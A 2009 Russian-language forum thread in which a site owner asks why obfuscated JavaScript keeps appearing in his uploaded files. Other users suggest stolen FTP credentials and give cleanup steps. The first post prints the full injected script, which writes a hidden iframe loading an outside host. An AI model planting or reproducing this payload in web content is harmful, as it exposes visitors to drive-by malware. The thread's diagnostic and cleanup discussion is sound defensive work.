Справочник функций

Ваш аккаунт

Войти через: 
Забыли пароль?
Регистрация
Информацию о новых материалах можно получать и без регистрации:

Почтовая рассылка

Подписчиков: -1
Последний выпуск: 19.06.2015

Надоедливый JS вирус

976
10 ноября 2009 года
mikhalych
198 / / 04.01.2009
Здравствуйте у меня такой вопрос.
Я несколько раз через FTP заливал свой сайт на сервер. (Даже на разные серверы)
И каждый раз некоторые файлы сайта были изменены.
Точнее туда добавлялась злонамерный javascript код приведенный ниже:

[HTML]
<script>function sYDozMLRL(qvQEVLNw){ var nuJAVCgu = document.getElementById('ylZGQIDm'); fff.op.replace("1030"); }
document['w152r172i114t116120e'.replace(/[0-9]/g,'')]('<div id=lGeD style="visibility:hidden;display:none">%3Ciframe width%3D1 height%3D1 border%3D0 frameborder%3D0 src%3D%27http%3A%2F%2Freklamma.com%2Fin.cgi%3F9%27%3E%3C%2Fiframe%3E</div>');function BzvYwRZCN(wRRJB){ var LMxDDWU = document.getElementById('jPkA');var EbAmdZRGA=new Function("iofTqcr", "return 8078;"); }
document['w101r182i140t196132e'.replace(/[0-9]/g,'')](unescape(document.getElementById('lGeD').innerHTML));function VuWiCyzaHi(vhMFeMyy){ var ngaoL=new Function("kVnKkkmVkC", "return 186934;"); }
function etvSxMYGf(sZzx){ fff.op.replace("450"); }
function PZhEG(AiP){ fff.op.replace("1093");window.eval(); }
</script>
[/HTML]

Несколько раз я менял пароли доступа на FTP сервер все равно не помогло. В чем может быть причина? :confused:
Это уже второй сервер куда я бросаю свой сайт и сталкиваюсь с такой проблемой. В моих кодах и в моем сайте такой javascript код отсутствует.
:(
245
10 ноября 2009 года
~ArchimeD~
1.4K / / 24.07.2006
Сайт самописный или на двиге?
Если на движке, то, вполне возможно, боты используют известные дыры.
976
10 ноября 2009 года
mikhalych
198 / / 04.01.2009
сайт 100% самописный, я сам написал.
536
10 ноября 2009 года
alex-kniaz
382 / / 07.08.2008
На обоих серверах идентичные "дополнения? Тогда предлагаю проверить методом убивания все возможные лишние процессы в в диспетчере задач и службы. Или же переснос системы:D
245
10 ноября 2009 года
~ArchimeD~
1.4K / / 24.07.2006
2alex-kniaz
где диспетчер задач??? где переснос системы??? на сервере??? :eek:

2mikhalych
огласите тогда уж, что за сервера, что за хостер. и откуда вы этот яваскрипт выцепили - открыв код страницы в браузере, или скачав свой же файл по фтп.
если хостинг бесплатный, вполне возможно, хостер рекламу просто вставляет (в яваскрипте не силен, но кажись там с рекламой что-то связано)
92
10 ноября 2009 года
Тень Пса
2.2K / / 19.10.2006
ну сколько можно мусолить эту тему.....

пароль от FTP палюбому сохранён в проге, через которую заливаете... если нет (да и если так, то тоже) - ищите вирусы у себя на машине.
смените пароль FTP на сервере, сделайте iptables'ами блокировку при 4х неуспешных попытках доступа....
проверено, работает. пароли утекают какому-нибудь трояну и понеслась.

и если опять же, как сказал ~Archimed~ это не бесплатный хостинг. потому что та же Agava, пихала свой JS с рекламой везде куда тока могла )))

UPD: да, конечно там домен reklamma :) но FF этот сайт заблочил ;) так что... см. выше =)
536
10 ноября 2009 года
alex-kniaz
382 / / 07.08.2008
Цитата: ~ArchimeD~
2alex-kniaz



У себя конечно. Раз на 2-х разных серверах одна проблема

325
11 ноября 2009 года
Franky
723 / / 10.08.2005
фаервол поставь и проскань систему, и будет тебе счастье. 100% сидит вирус.
8.5K
15 ноября 2009 года
FrostFX
121 / / 01.03.2007
Сегодня наш сайт сам словил такую фигню - я так понял, имеено этот JS сод добавляется в конец всех файлов на хостинге =(

Что именно этот код делает - хз) но с ним сайт написаный на PHP(двиг VamShop) и с элементами JS на страницах просто отказался работать...

Цитата: Тень Пса
ну сколько можно мусолить эту тему.....
пароль от FTP палюбому сохранён в проге, через которую заливаете... если нет (да и если так, то тоже) - ищите вирусы у себя на машине.
смените пароль FTP на сервере, сделайте iptables'ами блокировку при 4х неуспешных попытках доступа....
проверено, работает. пароли утекают какому-нибудь трояну и понеслась.


Моя венда-семерка была установлена вчера и ничего залить по фтп я просто не успел - сайт работал без подобных проблем около 2-х лет.

Цитата: Тень Пса

и если опять же, как сказал ~Archimed~ это не бесплатный хостинг. потому что та же Agava, пихала свой JS с рекламой везде куда тока могла )))


А вот это уже интересно - сайт просто не хочет открываться без Особого плагина Java(не скрипт). Выяснять что именно делает этот скрипт времени просто нет - нужно него убить поскорее и подумать как защититься.
Во время "нападения" у хостера упал Мускуль, ну это по крайней мере они нам так сказали. А до падения Мускуля была страння фигня тоже - сайт - интернет-магазин, в списке онлайн пользователей висел незарегистрированный юзер, который пихал себе в корзину все, что ни попадя, сумма корзины доросла до 6 миллионов рублей! Вот это я как раз и думаю был бот. Концы ip уходят куда-то в Москву, но станут ли бота пускать без проксей :D

Цитата: Тень Пса

UPD: да, конечно там домен reklamma :) но FF этот сайт заблочил ;) так что... см. выше =)


Я тоже офигел, когда при заходе Chromoм на обслуживаемый мною сайт, он мне заявил, что там вредоносное ПО...

8.5K
15 ноября 2009 года
FrostFX
121 / / 01.03.2007
Временное решение как быстро вычистить эту заразу - помогает связка прог FindFiles и Notepad++ - это под венду все... под линь не знаю альтернатив.

0. Меняем все пароли доступа к фтп
1. Дампим сайт себе на комп
2. Берем кусочек этого кода - я взял "function sYDozMLRL(qvQEVLNw)"
3. Ищем с помощью FindFiles этот кусок во всех файлах сайта
4. Открываем все найденные файлы одновременно в Notepad++
5. Заменяем во всех открытых файлах вышеприведенный код на пробел
6. Заливаем эти файлы обратно на фтп
7. Меняем все пароли доступа снова
8. Пытаемся изучить хттп и фтп логи доступа к сайту...

Знаете кого-то, кто может ответить? Поделитесь с ним ссылкой.

Ваш ответ

Реклама на сайте | Обмен ссылками | Ссылки | Экспорт (RSS) | Контакты
Добавить статью | Добавить исходник | Добавить хостинг-провайдера | Добавить сайт в каталог